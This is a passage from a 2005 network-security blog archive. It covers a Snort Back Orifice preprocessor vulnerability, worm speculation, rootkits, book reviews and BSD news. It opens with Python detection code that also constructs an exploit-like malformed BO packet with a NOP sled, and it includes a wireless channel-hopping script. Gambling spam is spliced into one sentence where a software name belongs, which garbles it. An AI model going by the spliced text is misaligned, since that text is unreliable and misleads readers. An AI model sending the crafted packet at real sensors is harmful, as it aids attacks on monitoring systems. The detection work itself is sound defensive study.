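    if bo_len != len(payload):
        result["flags"].append(
            "length field %d does not match UDP payload length %d" % (bo_len, len(payload)))
    sled = longest_run(data, 0x90)
    if sled >= NOP_SLED_MIN:
        result["flags"].append("%d-byte run of 0x90 (NOP sled) after the header" % sled)
    return result


def bo_build(key, bo_len, bo_id, bo_type, data):
    """Encrypt a BO packet from its fields; used here only to construct samples."""
    return bo_crypt(key, BO_MAGIC + struct.pack("<iiB", bo_len, bo_id, bo_type) + data)


# Constructed samples. PAGE_PACKET_HEAD is the first 8 UDP payload bytes of the
# exploit packet in the tcpdump output above (offset 0x1c into the IP packet).
PAGE_PACKET_HEAD = bytes.fromhex("ce63d1d216e713cf")
BENIGN_PING = bo_build(4242, BO_HEADER_LEN + 4, 7, BO_TYPE_PING, b"ping")
EXPLOIT_LIKE = bo_build(BO_DEFAULT_KEY, -1, -1, BO_TYPE_PING, b"\x90" * (1400 - BO_HEADER_LEN))

if __name__ == "__main__":
    print("key recovered from the packet on this page:", bo_find_key(PAGE_PACKET_HEAD))
    for name, pkt in (("benign ping", BENIGN_PING), ("exploit-like ping", EXPLOIT_LIKE)):
        print(name, bo_inspect(pkt))
```

Two points worth noticing when you run it. First, the key recovery is a 65536-way brute force over eight bytes for every UDP packet, and it has to succeed before any length check can happen, so a detector that decrypts into a fixed buffer is doing attacker-controlled work on every datagram. Second, the length field is the cheapest discriminator: a real PING carries its own size in the header, while the exploit's header says -1 and the datagram is 1400 bytes long, which is why the tool above prints a data length of -18.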
On a related note, I saw Tom Ptacek comment on my earlier post. Tom says:
"There is nothing wrong with looking for vulnerabilities in your competitor's products, and Neel Mehta has built enough of a rep for himself that he doesn't need to take 'marching orders' from anybody."
I agree there is nothing wrong with looking for vulnerabilities in your competitor's products. However, are we supposed to believe that Neel Mehta, an ISS X-Force researcher, developed this exploit on his own? Are we supposed to think he did not do this at the direction of his employer, who published an advisory? If Neel discovered this vulnerability on his own, and not while working for ISS, why did Sourcefire learn of the vulnerability from US-CERT and not Neel himself?
Monday, October 24, 2005
Reviews of Computer Security 20 Things Every Employee Should Know, 2nd Ed, The Symantec Guide to Home Internet Security Posted
Ben Rothke's Computer Security: 20 Things Every Employee Should Know, 2nd Ed, contains a great deal of sound advice for nontechnical employees. At least 10 tips could be eliminated by combining redundancies. I would reduce the list to the following topics:
(1) Beware malware, spyware, and phishing; (2) Protect your identity; (3) Protect the organization's data; (4) Choose sound passwords and protect them; (5) Use organization resources for authorized purposes; (6) Beware of social engineers; (7) Call the experts when things go wrong; (8) Protect laptops, PDAs, cell phones, and other mobile devices as you would corporate resources.
The Symantec Guide to Home Internet Security (TSGTHIS) is Symantec's latest offering in its new series of books published through Addison-Wesley. This is a very solid introductory desktop security book for home power users. This is not the book to give to your grandmother, unless she likes to tweak Windows or wants to understand differences between file infector and polymorphic viruses. With one caveat, I liked this book...
The book suffers one major flaw that robbed a star from my rating. The single most important defensive measure a home user can take is to not perform daily operations as a user with administrative privileges. Home users should not browse the Web, read email, chat in IM, write documents, or do much anything else using an admin account. Users should only assume admin level power when they need to install software or authorized Active X controls. This single defensive measure is not mentioned by TSGTHIS, but it has protected numerous customers and my family from thousands of client-side attacks.
More on Engineering Disasters and Bird Flu
Here's another anecdote from the Engineering Disasters story I wrote about recently. In 1956 the cruise ship Andrea Doria was struck and sunk by the ocean liner Stockholm. At that time radar was still a fairly new innovation on sea vessels. Ship bridges were dimly lit, and the controls on radar systems were not illuminated. It is possible that the Stockholm radar operators misinterpreted the readings on their equipment, believing the Andrea Doria was 12 miles away when it was really 2 miles away. The ships literally turned towards one another on a collision course, based on faulty interpretation of radar contact in the dense fog. Catastrophe ensued.
This disaster shows how humans can never be removed from the equation, and they are often at center stage when failures occur. The commentator on the show said a 10 cent light bulb illuminating the radar controls station could have shown the radar range was positioned in a setting different from that assumed by the operator. Following the Andrea Doria collision, illumination was added to ship radar controls. This story reminded me that the latest security technology is worthless -- or even worse, damaging -- in the hands of people who are not trained or able to use it properly.
On a different subject, I heard an interview on NPR with Health and Human Services Secretary Mike Leavitt about bird flu. He likened the situation to "surveillance" of a dry forest during fire season. He said that the best defense was vigilance and rapid response. His analogy assumed being nearby when a small fire erupts. First responders who are quickly on the scene can stamp out a fire before it becomes uncontrollable. If the response team is unaware of the fire, it can spread and then be beyond containment. He concluded the interview saying "ultimately, another pandemic will come. Right now we are not prepared."
I thought his comments applied well to digital security incidents. NSM is surveillance, and incident response helps stamp out fires (or bird flu outbreaks) quickly before they exceed an organization's capacity to deal with them. Is your organization ready? If you want to know, TaoSecurity provides services like incident response training and CSIRT assessments and evaluations.
Labels: disasters, engineering, favorites, nsm, topcan
Pre-Review Postscript
Bejtlich Speaking at RSA Conference 2006
My proposal to speak at the RSA Conference 2006 was accepted out of 1500+ submissions. I will present in San Jose, CA on Tuesday, 14 February 2006 from 1735 to 1825. The subject is Traffic-Centric Incident Response and Forensics.
Sunday, October 23, 2005
Latest Book Pre-Reviews
During the last two months my work for TaoSecurity has kept me too busy to read and review books. I am trying to get back on track. Here are pre-reviews for books I have received over the last several weeks. First are two books I intend to keep as reference, but which I don't plan to read cover-to-cover. Hence, I won't review them for Amazon.com.
First is Cisco IOS in a Nutshell, 2nd Ed by James Boney. I put this book next to my copy of O'Reilly's UNIX in a Nutshell, 3rd Ed. This book looks like an excellent reference for Cisco admins and anyone pursuing an advanced Cisco certification (beyond the CCNA). I may read the first 350 pages, as the chapters in that half of the book each address a topic of interest, like IP routing or QoS. The last half of the book is a command syntax reference.
Windows Server 2003 Network Administration by Craig Hunt and Roberta Bragg is sitting in my reference section next to O'Reilly's Learning Windows Server 2003 and Windows Server Cookbook. The book appears to be a comprehensive overview of networking services from a Microsoft perspective. Next I turn to books I plan to read and review.
Beginning Python by Magnus Lie Hetland is an update of his 2002 book Practical Python. I originally tried to learn Python by reading Learning Python, 2nd Ed in early 2004, but I bailed on that book after a few chapters. I am really excited to try again with Magnus' book. I consider it to be the gateway to a series of other excellent Apress Python books like Dive Into Python and Foundations of Python Network Programming, which I plan to read. (I hope O'Reilly's Python Cookbook, 2nd Ed will be a good addition to this trio.) I plan to read this book as part of my programming education, which will start once I clear the books which follow.
Ben Rothke sent me a copy of his updated book Computer Security 20 Things Every Employee Should Know, 2nd Ed. This is a booklet that would be appropriate as part of a digital security awareness campaign in a company of any size. After skimming through it, the advice seems sound and I would have no problem recommending the book to clients.
The Symantec Guide to Home Internet Security by Andrew Conry-Murray and Vincent Weafer is Symantec's latest foray into the security publishing world. This is a fairly short book, which makes sense given the level of interest and expertise of the intended audience. I would be pleased with it if I could imagine sending it to my parents -- maybe with a copy of FreeBSD? (Probably not!)
VMware Workstation 5 Handbook by Steven S. Warren is a new book from Charles River Media. I had this book on my Amazon.com Wish List for months before I bought a copy at a local Borders. A few days later the publisher shipped me one! They must have read my wish list. This book looks like a thorough and easy-to-read overview of Workstation features. With the introduction of Teams, Snapshots, Clones, and other advances over the 3.x and 4.x lines, I look forward to learning how to make the best use of VMware in my classes and in testing scenarios.
I have not abandoned plans for a TaoSecurity Podcast. I hope two books can give me advice on how best to proceed. The first I plan to read is Todd Cochrane's Podcasting: A Do-It-Yourself Guide, published by Wiley. This was one of the first podcasting books to appear that got reasonable Amazon.com reviews. I hope to gain some insights on how best to create podcasts using minimal equipment.
Shortly after I received a copy of the previous book, I learned of Jack Herrington's Podcasting Hacks. The O'Reilly Hacks series usually contains lots of good advice, but the format is seldom read cover-to-cover. It's more an assortment of helpful tips and tools.
Three books from Syngress are next. First is Sarbanes-Oxley IT Compliance Using COBIT and Open Source Tools by Christian B. Lahti and Roderick Peterson. I will admit up front that I will bail on this book unless it hooks me. I am not a regulatory compliance person, but I would like to learn a little more about SOX and COBIT. I would like this book to provide the background I need to understand these issues.
Software Piracy Exposed by Paul Craig and Ron Honick will be good if it follows in the footsteps of an earlier Syngress book, Inside the Spam Cartel. I don't know much about modern software piracy, so I thought this book might provide a glimpse into that threat sector.
Nessus, Snort, & Ethereal Power Tools: Customizing Open Source Security Applications by Brian Caswell, Gilbert Ramirez, Jay Beale, Noam Rathaus and Neil Archibald looks like a great book. The only existing review on Amazon.com (3 stars) complains "Very in-depth, however, not for someone who is just starting out on Snort, Nessus, or Ethereal. New to Snort, Nessus, or Ethereal - Buy something else." Does every book have to assume a newbie audience? Of course not -- state the prerequisite knowledge up front, and press on!
The Definitive Guide to MySQL 5, 3rd Ed by Michael Kofler looks like a great overview of features found in MySQL 5, which is currently a release candidate at version 5.0.13. The "generally available" version is 4.1.15, which is the one people are most likely encouraged to use in production. Once MySQL 5 leaves RC status, I plan to incorporate it into my Sguil Installation Guide, along with FreeBSD 6.0 and Sguil 0.6.0. All three components should be ready within the next several weeks.
After years of no publications about Debian, this year has seen two books about that Linux distro. First was Wiley's Debian GNU/Linux 3.1 Bible by David B. Harris and Jaldhar Vyas. Now we have No Starch's The Debian System by Martin F. Krafft. I am much more willing to devote time to a new operating system when it is backed by books. Online documentation is fine, but a published book is something I can recommend to others in a physical form. It carries much more weight (literally) than online documentation. I plan to evaluate how I might integrate Debian into my lab, although I already have it running on a PA-RISC box that normally hosts HP-UX.
Finally we arrive at Security and Usability, a collection of essays edited by Lorrie Faith Cranor and Simson Garfinkel. I think this is the sort of book I might read on a cross-US flight. I am not a big fan of collections of essays, but in a captive environment (i.e., stuck on a plane) I might find sanctuary in the ideas contained in this book.
So that's a ton of new books. My personal reading list currently shows 24 non-programming and 24 programming books on my bookshelf. That does not count reference books that I have pre-reviewed but do not plan to read cover-to-cover. My Amazon.com Wish List shows another 21 books on the horizon that appear interesting. Since I do not have any new major writing projects planned for the next year, I would like to make progress on all of this reading. Stay tuned to my Amazon.com Reviews as I read and review the titles seen here and elsewhere. Thank you!
Saturday, October 22, 2005
Further Thoughts on Engineering Disasters
My TiVo managed to save a few more episodes of Modern Marvels. You may remember I discussed engineering disasters last month. This episode of the show of the same title took a broader look at the problem. Three experts provided comments that resonated with me.
First, Dr. Roger McCarthy of Exponent, Inc. offered the following story about problems with the Hubble Space Telescope. When Hubble was built on earth, engineers did not sufficiently address issues with the weight of the lens on Earth and deflections caused by gravity. When Hubble was put in orbit, the lens no longer deflected and as a result it was not the proper shape. Engineers on Earth had never tested the lens because they could not figure out a way to do it.
So, they launched and hoped for the best -- only to encounter a disaster that required a $50 million orbital repair mission. Dr. McCarthy's comment was "A single test is worth a thousand expert opinions." This is an example of management by fact instead of management by belief, mentioned previously on this blog.
Second, Dr. Charles Perrow, author of Normal Accidents: Living With High-Risk Technologies, explained the makings of a disaster. Essentially, he said disasters are caused by the unforeseen consequences of multiple, individually non-devastating, failures in complex systems. Most catastrophes could be prevented if any one of the small failures had not occurred. Third, Mary Schiavo commented on the Challenger disaster. She described the well-known problems with operating the Shuttle's rocket O-rings in temperatures below 53 degrees F. The Shuttle had launched at lower temperatures prior to the Challenger explosion, but NASA knew they were risking catastrophe. Ms. Schiavo said NASA engineers begged their managers not to let Challenger launch, seeing that chunks of ice covered the launch pad and Shuttle. They were overruled and disaster occurred.
This struck a chord with me, because a few days earlier I read a new story in Time about how Steve Jobs gets Apple to bring innovative products to market:
Apple CEO Steve Jobs [will] tell you an instructive little story. Call it the Parable of the Concept Car. "Here's what you find at a lot of companies," he says, kicking back in a conference room at Apple's gleaming white Silicon Valley headquarters, which looks something like a cross between an Ivy League university and an iPod. "You know how you see a show car, and it's really cool, and then four years later you see the production car, and it sucks? And you go, What happened? They had it! They had it in the palm of their hands! They grabbed defeat from the jaws of victory!
"What happened was, the designers came up with this really great idea. Then they take it to the engineers, and the engineers go, 'Nah, we can't do that. That's impossible.' And so it gets a lot worse. Then they take it to the manufacturing people, and they go, 'We can't build that!' And it gets a lot worse."
When Jobs took up his present position at Apple in 1997, that's the situation he found. He and Jonathan Ive, head of design, came up with the original iMac, a candy-colored computer merged with a cathode-ray tube that, at the time, looked like nothing anybody had seen outside of a Jetsons cartoon. "Sure enough," Jobs recalls, "when we took it to the engineers, they said, 'Oh.' And they came up with 38 reasons. And I said, 'No, no, we're doing this.' And they said, 'Well, why?' And I said, 'Because I'm the CEO, and I think it can be done.'"
Would Steve Jobs have overruled the NASA engineers and launched Challenger? Who knows.
From what I have learned, disasters are prone to happen in complex, tightly-coupled systems. The only way to try to avoid them is to test and monitor their operation, exercise response, and then implement those plans when catastrophe occurs. Anything less is like launching a defective, untested Hubble and hoping for the best, and then paying through the nose to clean up the mess.
Here are a few footnotes to this post. Dr. McCarthy's company offers security engineering services, including services for information systems. They are described thus: "We have assembled one of the largest private collections of computerized accident and incident data in the world. Our web-based solutions put this information at your disposal, giving you comprehensive risk data quickly and at low cost." Dr. McCarthy was recently elected to the National Academy of Engineering, which has a Computer Science and Telecommunications Board with an Improving Cybersecurity Research in the United States project. My research for this story also led me to the System Safety Society.
Excellent Pf Documentation
I recently learned of Peter N. M. Hansteen's document Firewalling with OpenBSD's PF packet filter. I really like the approach Peter takes to describing Pf. He explains enabling Pf on OpenBSD, FreeBSD, and NetBSD, and then builds up the capabilities one can employ using Pf. I recommend anyone who wants to learn more about Pf start with Peter's document.
Incidentally, OpenBSD 3.8 will be available at an FTP server near you on 1 November.
The Coming Snort Worm
This week we learned via an advisory of a vulnerability in the Back Orifice preprocessor in Snort versions 2.4.2, 2.4.1, and 2.4.0. The vulnerability was discovered by another ISS X-Force researcher. I bet (but have no inside knowledge) that he was following the same marching orders that Mike Lynn received: find vulnerabilities in competitors' products. Mike looked at Cisco, and Neel Mehta looked at Sourcefire's Snort.
I am sure ISS is still bitter over the Witty worm that revealed the installed ISS RealSecure and BlackIce userbase to be about 12,000 systems. The Witty worm spread via a single UDP packet with a fixed source port of 4000 UDP.
Let's consider the factors that lead me to believe that the Snort BO vulnerability will produce a worm.
- The new vulnerability can be exploited by a specially crafted UDP packet to or from any port other than port 31337. (Thanks to Jose Nazario for correcting me on this point.) This is similar to the UDP packet used by Witty. UDP is an ideal worm vector, as demonstrated by Slammer. There is no need for a TCP handshake, which means spoofing is much easier.
- Sensors need not be directly targeted. All a worm has to do is send exploit UDP traffic to a segment monitored by a vulnerable Snort sensor. The attacker need not know anything about the target's management IP address.
- Snort has been in the news recently as a result of its acquisition by Checkpoint. A worm coder can kill or embarrass two birds with one UDP stone.
- Snort is everywhere -- .com, .net, .org, .edu, .gov, etc. 0wning a .mil or .gov Snort sensor gives intruders the ultimate vantage point over a monitored network. I imagine sophisticated intruders have already compromised a slew of sensitive Snort sensors, but at some point a lower life form will decide to turn the exploit into a worm.
- Snort source code is available, so comparing 2.4.0-2.4.2 with 2.4.3 means the vulnerability can be quickly identified.
I can imagine a few factors that will reduce the likelihood of a worm.
- The vulnerability reportedly exists in Snort versions 2.4.0 through 2.4.2. That's a narrow set of versions, given Snort 2.4.0 was released in July. I have heard of users running Snort 1.8.x and 1.9.x; they complain about rules that don't work with their versions. Argh!
- Snort runs on a huge number of platforms. That is one of the beauties of the program. Will a worm target Snort on Linux? If so, what distro/kernel/version/etc.? How about Snort on Windows? That would make the most sense -- the OS would be fairly similar, and the user base would make for good targets. We'll see.
- Sophisticated intruders will keep any exploit to themselves. They may try to keep it out of the hands of the bottom feeders.
What do you think? Will we see a Snort worm? I'm keeping an eye on FrSIRT.
On a related note, be sure to upgrade to Ecá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365real 0.10.13 -- 0.10.12 has bugs too.
Friday, October 21, 2005
VMware Player Changes Everything
In the words of the immortal Joey -- "whoa." I just learned of, and tried, the new VMware Player. If you haven't heard of it yet, VMware Player is a free program for Windows and Linux users that allows them to run a single VM on their host OS. VMware Player is like a stripped down version of VMware Workstation. It does not support snapshots, and the documentation says only one VM can run at a time (despite what the comparison chart implies).
This changes everything. Everyone who is an end user of VMs (not a creator) just saved $189 for a VMware Workstation license. This includes students who use VMware on their class desktops or laptops. Authors can now distribute VMs with books (like a second edition of Real Digital Forensics?) and have readers access those VMs with the free VMware Player.
I tried one of the freely available images in the Virtual Machine Center -- the Browser-Appliance. As you can see from the screen shot below, it's an Ubuntu Linux distro.
I have not tried any of the innovative hacks involving VM files, but I would like to evaluate them. I'm considering building a VM of a complete Sguil installation using FreeBSD 6.0 and Sguil 0.6.0 when available. This approach easily avoids the problems with building and maintaining live CDs!
I applaud VMware for providing this free no-cost program. It is obviously an attempt to build market share and direct attention away from Microsoft's product. (The two were compared in a recent NWC review.)
How do you plan to use VMware Player?
VirtualWiFi and Monitoring
While teaching Network Security Operations last week, I presented material on monitoring wireless networks. Sample syntax follows:
orr:/root# ifconfig wi0 mediaopt monitor channel 6 up
orr:/root# tcpdump -i wi0 -L
Data link types (use option -y to set):
EN10MB (Ethernet)
IEEE802_11 (802.11)
IEEE802_11_RADIO (802.11 plus BSD radio information header)
orr:/root# tcpdump -n -i wi0 -y IEEE802_11
One of the students asked if Tcpdump supported hopping across channels to monitor multiple networks simultaneously. I did not know of a way to do this, because the channel to monitor must be specified as shown above. An alternative requires running multiple wireless NICs.
I just learned of Microsoft's VirtualWiFi research project. This is a continuation of Ranveer Chandra's work on MultiNet. If VirtualWiFi supports putting a wireless NIC into monitor mode on Windows, it is possible to virtualize the NIC for as many channels as one wishes to monitor. Separate WinDump instances could sniff each virtual NIC. If anyone wishes to try this, please share your results in a comment.
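The student's channel-hopping question has a sequential answer with the single NIC used above: retune the card every few seconds and start a fresh tcpdump per channel. The script below is an added example, not code from the original post; it assumes the wi0 interface and the FreeBSD ifconfig/tcpdump syntax shown above, and the channel list, dwell time and output directory are assumptions you can override through the environment.

```sh
#!/bin/sh
# Round-robin channel hopping with one BSD wireless NIC.
# Added example, not code from the original post. It reuses the
# "ifconfig wi0 mediaopt monitor channel N up" and
# "tcpdump -n -i wi0 -y IEEE802_11" syntax shown above; the interface
# name, channel list, dwell time and output directory are assumptions
# that can be overridden through the environment.

IFACE="${IFACE:-wi0}"
CHANNELS="${CHANNELS:-1 6 11}"   # non-overlapping 2.4 GHz channels (assumed)
DWELL="${DWELL:-10}"             # seconds to listen on each channel
OUTDIR="${OUTDIR:-.}"

# first_channel: print the first channel in $CHANNELS.
first_channel() {
    set -- $CHANNELS
    printf '%s\n' "$1"
}

# next_channel CURRENT: print the channel that follows CURRENT in
# $CHANNELS, wrapping to the first channel at the end of the list
# (or when CURRENT is not in the list at all).
next_channel() {
    found=0
    for ch in $CHANNELS; do
        if [ "$found" -eq 1 ]; then
            printf '%s\n' "$ch"
            return 0
        fi
        if [ "$ch" = "$1" ]; then
            found=1
        fi
    done
    first_channel
}

# pcap_path CHANNEL STAMP: one capture file per channel and dwell period,
# so later passes over the same channel do not overwrite earlier ones
# (tcpdump -w truncates an existing file).
pcap_path() {
    printf '%s/%s-ch%s-%s.pcap\n' "$OUTDIR" "$IFACE" "$1" "$2"
}

# tune CHANNEL: put the NIC into monitor mode on CHANNEL, as in the post.
tune() {
    ifconfig "$IFACE" mediaopt monitor channel "$1" up
}

# capture CHANNEL STAMP: sniff raw 802.11 frames on the current channel.
capture() {
    tcpdump -n -i "$IFACE" -y IEEE802_11 -w "$(pcap_path "$1" "$2")"
}

# hop_loop: retune to the next channel every DWELL seconds, running one
# tcpdump per dwell period in the background and stopping it before the
# retune. Ctrl-C (SIGINT) stops the current capture and exits.
hop_loop() {
    pid=""
    trap 'if [ -n "$pid" ]; then kill "$pid" 2>/dev/null; fi; exit 0' INT TERM
    ch=$(first_channel)
    while :; do
        tune "$ch"
        capture "$ch" "$(date +%Y%m%d%H%M%S)" &
        pid=$!
        sleep "$DWELL"
        kill "$pid" 2>/dev/null
        wait "$pid" 2>/dev/null || true
        ch=$(next_channel "$ch")
    done
}

# Only hop when invoked as "sh hop.sh run"; sourcing the file for its
# helpers leaves the interface untouched.
case "${1:-}" in
    run) hop_loop ;;
esac
```

A hopper hears each channel for only a fraction of the time, so it is a survey tool, not a substitute for one NIC (or one virtual NIC) per channel.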
Commercial Rootkits Make NSM Even More Relevant
Last month I posted Rootkits Make NSM More Relevant Than Ever. A few weeks ago I spoke at a Cisco training event attended by over 400 sales engineers and broadcast to several hundred more. I built my presentation on the "NSM, Now More Than Ever" theme. Since Cisco is a network infrastructure company, my message resonated with them. I would have delivered the same message to Microsoft if asked, but I am not a 31337 BlueHat h@x0r.
Today I learned through Tom Sanders' story Rootkit creators turn professional about Golden Hacker Defender (GHD). GHD is a modification of the freely available Windows userland rootkit Hacker Defender (HD) by holy_father. Buyers can customize HD to suit their needs, which usually involves evading detection.
For example, the ultimate form of HD is listed as Brilliant Hacker Defender Forever, shown in the following screen capture. The cost is 900 Euro, or 1,077.09 USD at today's rates.
Anti-virus company F-Secure brought this product to light in a recent blog posting. F-Secure's BlackLight product tries to detect rootkits; alternatives include RootkitRevealer by SysInternals and Microsoft's Strider Ghostbuster.
Blogger PABlo promises more coverage on rootkits, which I intend to follow.
Monday, October 17, 2005
Useful Nmap Documentation
Today Slashdot notified me of an interview with Nmap author Fyodor. I found it interesting that Fyodor makes a living through Insecure.Com LLC, whose "primary business is licensing Nmap technology for inclusion in commercial products." I also learned he is working on a book on Nmap, and he "only [has] a couple chapters left to draft." Apparently the new Nmap man page is an excerpt from this book.
By reading Slashdot comments, I learned about James Messmer's online book Secrets of Network Cartography: A Comprehensive Guide to Nmap. I have not reviewed this book for technical content, but the table of contents looks interesting. Anyone who considers themselves to be a security or traffic analyst should be familiar with Nmap's workings. It is important to understand how all of the Nmap scans work and how they appear in traffic excerpts.
Sunday, October 16, 2005
Register for 20 October ISSA-NoVA Meeting by Noon Tuesday
To my DC metro area readers: if you'd like to attend the local ISSA-NoVA chapter meeting on Thursday night, please RSVP by noon Tuesday. I plan to be there to hear Paco Hope discuss FreeBSD and OpenBSD.
Friday, October 14, 2005
MySpace Worm Demonstrates NSM Principles
In my first book, The Tao of Network Security Monitoring: Beyond Intrusion Detection, I say "some intruders are smarter than you," and "intruders are unpredictable." Because of these two facts, prevention eventually fails. In other words, intruders are cleverly figuring out ways to circumvent security of services you have never heard about in ways you could not imagine. As a result, defenses fail and monitoring is the only way to detect that failure and respond appropriately.
The story Cross-Site Scripting Worm Hits MySpace is a perfect example of these principles in action. In short, someone figured out how to create a worm on the MySpace online community. More details are posted at this Slashdot thread.
I had never heard of MySpace until today, but over a million users were affected by this worm. Did you see this coming? Of course not. There is little point in forecasting future threats. The best we can do is to implement the best preventative defenses we can, monitor everything else, and respond in a timely manner.
Thursday, October 13, 2005
Bejtlich Quotes in Sourcefire Acquisition Story
Eric B. Parizo mentioned me in his story Snort users fear future under Check Point. One of the quotes appears as follows:
Richard Bejtlich, principal with Washington, D.C.-based consultancy Tao Security, said many fail to realize just how expensive it is to support a product like Snort.
"I've been to Sourcefire, and I've seen how many people they have working on the product and on signatures," Bejtlich said. "They have what seems like millions and millions of racks of equipment. I was surprised they were able to continue with Snort as they did."
That should say "millions and millions of dollars of racks of equipment." I obviously haven't seen millions of racks of anything when I visit Sourcefire!
Also, I appear to have been demoted at my own company. I am not a "principle" at TaoSecurity. My boss must be upset with my performance! :)
Wednesday, October 12, 2005
Brief Thought on Digital Security
I was asked to write an article for an upcoming issue of Information Security Magazine based on my Engineering Disasters blog post. I had the following thought after writing that article.
When an engineering catastrophe befalls the "real" or "analog" world, it's often very visible. Failed bridges collapse, levees break, sink holes swallow buildings, and so on. If you look closely enough, prior to ultimate failure you see indications of pending doom. Cracks appear in concrete, materials swell or contract, groaning noises abound, etc.
This is generally not the case in the digital world. It is possible for an enterprise to be completely owned by unauthorized parties, without any overt signs. If one knows where to look of course, indicators can be seen, and evidence of compromise can be gathered, analyzed, and escalated. This is the reason I advocate network security monitoring (NSM) and conducting traffic threat assessments (TTAs).
Tuesday, October 11, 2005
SecurityMetrics Documents Security Cycles
Andrew Jaquith of SecurityMetrics.org posted an interesting story called Hamster Wheels of Pain. It's a follow-up to an earlier article. I think the present story is cool because Andrew collected and posted the security process "wheels" of 11 security vendors.
I recognize Foundstone's in there, shown as a thumbnail at left.
I think Andrew is a little too cynical regarding some of these process charts. Some are used to sell products, and often reflect vendor biases. Others are just ways to break the security problem down into manageable chunks.
I use the diagram at right in my classes to emphasize the traffic-centric approach I take to network security operations. Does this make me bad? I doubt it.
BSD Certification Group Publishes BSD Associate Exam Objectives
Last week the BSD Certification Group published its BSD Associate Exam Objectives (.pdf). The preface of the document explains its purpose:
"This document introduces the BSD Associate (BSDA) examination and describes in considerable detail the objectives covered by the exam. The exam covers material across all four major projects of BSD Unix - NetBSD, FreeBSD, OpenBSD and DragonFly BSD.
While the testing candidate is expected to know concepts and practical details from all four main projects, it is not necessary to know all the details of each one. A thorough reading of this document is recommended to understand which concepts and practical details are expected to be mastered.
Throughout this document, a clear distinction is placed on 'recognizing' and 'understanding', versus 'demonstrating' and 'performing'. Certain objectives call for the mere understanding of certain topics, while others call for the ability to demonstrate performance level knowledge of the topic...
Successful mastery of the BSDA examination will, in most cases, require study and practice. The requirements for the exam encompass more background in BSD than is common among casual users or those new to BSD. This is a deliberate decision by the BSD Certification Group - to encourage more cross learning among BSD systems so that breadth of understanding of BSD is as heavily tasked as depth of understanding. The result will be a more well-rounded BSD advocate and a more knowledgeable system administrator."
The objectives describe seven domains:
- Installing and Upgrading the OS and Software
- Securing the OS
- Files, Filesystems, and Disks
- Users and Accounts Management
- Basic System Administration
- Network Administration
- Basic Unix Skills
Inside, the document describes the audience for the certification:
"The BSDA certification is designed to be an entry-level certification on BSD Unix systems administration. Testing candidates with a general Unix background, but less than six months of work experience as a BSD systems administrator (or who wish to obtain employment as a BSD systems administrator) will benefit most from this certification."
Also:
"[T]he BSDA certification is only valid for 5 years. Existing BSDAs who wish to maintain their certification will need to recertify every 5 years. Details on how to recertify will be publicly available in a document to be published in 2006."
I like this approach. I disagree that DragonFly BSD should be included, since something like 2% of all BSD administrators use DragonFly.
The guide is 57 pages long, so I will need time to read everything. At first glance it looks like great work.
Although I am still listed on the about us page, I have requested resignation as I have absolutely no time to work on the project while running TaoSecurity.
FreeBSD 6.0-RC1 Available

FreeBSD 5.5, at least one more upgrade to the existing 5.x tree, is scheduled for arrival in November. According to the security advisory schedule, FreeBSD 4.11 will enter end-of-life status on 31 January 2007. After that date no security fixes for the 4.x tree will be officially provided. Support for the 5.x tree will end earlier, 31 May 2006. I believe the FreeBSD team is trying to encourage 5.x users to migrate, and leave a window open for people who have been running 4.x for years.
TaoSecurity Blog on CNET Blog 100
I received word today that this blog was added to the CNET News.com Blog 100 list. My site is described as a "good aggregation of information on a wide range of security issues. Detailed and authoritative, with many updates." I've been really busy preparing, teaching and speaking the last several weeks, but I expect to return to my normal blogging pace late next week. Thanks CNET!
Saturday, October 08, 2005
New FreeBSD Web Site Launched

Thoughts on the Week's Security News
This was a busy week for me; I spent all week teaching (and all last week preparing) a private Network Security Operations class in California. I just flew back from LAX to Dulles this morning and I get on another plane tomorrow afternoon. I'm speaking in San Jose at a Cisco event, and then teaching a second private NSO class again next week.
I've been tracking all of the week's security news. Thank you to those who thought I may have missed something. I didn't want to commit any thoughts to the blog without taking some time to ponder various events. Obviously the biggest news of the week was Checkpoint's $225 million acquisition of Sourcefire.
In short, I didn't see that coming. I have doubts about the future of Snort being a free product, let alone open source. I don't see anyone making the case to the board of a publicly traded company that part of that company's work is going to be given away for free, especially after spending $225 million for it.
You may have seen how Checkpoint is treating users of the free version of Zonealarm, which was purchased by Checkpoint two years ago for $225 million. Sure, the basic Zonealarm firewall is still free, but Checkpoint will not provide a patch for a new security problem. Checkpoint claims the problem has low severity even though proof of concept code exists. To quote John LaCour, director of security services: "It is a theoretical attack that we don't see used in the real world." Great. That rationale has certainly stood the test of time (not).
However, I do not fault Sourcefire at all for being purchased. I never faulted them for the way they handled the new rules licensing, either. The amount of manpower and resources they devote to Snort is incredible, so I am happy to see them be rewarded. I am just not sure Checkpoint is the right fit, at least from where I stand. What are your thoughts?
Saturday, October 01, 2005
Real Digital Forensics and Shirts
This week I received a batch of TaoSecurity T-shirts for my Network Security Operations class. The back of the T-shirt is pictured at left. The front of the T-shirt shows the TaoSecurity logo.
I also received my copy of our new book Real Digital Forensics, also pictured at right. You can visit the publisher Addison-Wesley to review the table of contents, the preface, and also download the first chapter. It's a review of Windows live response.
I think you will really enjoy this book. I wrote it with Keith Jones and Curtis Rose from Red Cliff Consulting. The project was two, almost three years in the making. In the book we look at intrusions from the perspective of the file system, memory, and network activity. (Guess who handled the network side?) :) All of the evidence we analyze is included on a DVD shipped with the book. You can get a better look at the cover in the photo at left. In addition to TaoSecurity T-shirts for my class students, I'm making TaoSecurity polo shirts. I wear these when consulting. Several people have asked if I will sell the T-shirts and polo shirts. I'm not promising anything, but if you're interested please post a comment. Incidentally I'm not using Cafe Press; I found a good local dealer who has been providing excellent quality shirts.
Comment Verification Activated
Some idiot's comment spam bot posted over 70 "comments" to this blog last night. I am working my way through deleting them all. This is the latest salvo in an escalating battle which started with intermittent spam comments several months ago. To try to reduce these automated attacks in the future, I've enabled comment verification. I hope it is not too onerous for those making legitimate comments. Thank you.